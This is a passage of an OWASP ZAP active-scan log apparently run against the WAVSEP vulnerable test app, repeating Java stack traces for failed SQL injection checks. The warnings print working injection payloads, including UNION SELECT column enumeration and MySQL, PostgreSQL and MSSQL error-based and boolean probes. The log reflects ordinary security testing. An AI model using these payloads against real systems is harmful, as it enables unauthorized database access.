org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680079 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680080 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680081 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680083 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680085 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680086 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 7257 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7257=7257,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT 7257 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7257=7257,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680086 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680087 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680088 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(9201=9201,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(9201=9201,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680090 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680090 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5050=5050) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5050=5050) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680091 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6774=6774) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6774=6774) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680092 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at 